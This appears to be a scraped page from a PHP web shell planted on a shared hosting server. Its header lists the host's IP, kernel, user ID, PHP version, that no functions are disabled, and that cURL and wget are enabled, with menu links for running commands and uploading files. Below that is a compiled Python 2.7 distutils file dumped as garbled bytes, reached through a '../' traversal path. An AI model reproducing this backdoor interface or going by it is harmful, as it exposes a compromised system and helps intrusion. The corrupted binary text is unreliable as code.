|
Server IP : 2a02:4780:11:1373:0:3017:be17:10 / Your IP : 216.73.216.55 Web Server : LiteSpeed System : Linux in-mum-web1273.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u806862359 ( 806862359) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /var/cache/../www/../../lib64/gems/../gconv/../python2.7/distutils/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
�
{fc @ sR d Z d d l Z d d l m Z d d l m Z d Z d e f d � � YZ d S( s� distutils.pypirc
Provides the PyPIRCCommand class, the base class for the command classes
that uses .pypirc in the distutils.command package.
i����N( t ConfigParser( t CommandsE [distutils]
index-servers =
pypi
[pypi]
username:%s
password:%s
t
PyPIRCCommandc B su e Z d Z d Z d Z d
Z d
Z d d d e f d g Z d g Z d � Z
d � Z d
� Z d � Z
d � Z RS( s; Base command that knows how to handle the .pypirc file
s https://upload.pypi.org/legacy/t pypis repository=t rs url of repository [default: %s]s
show-responses&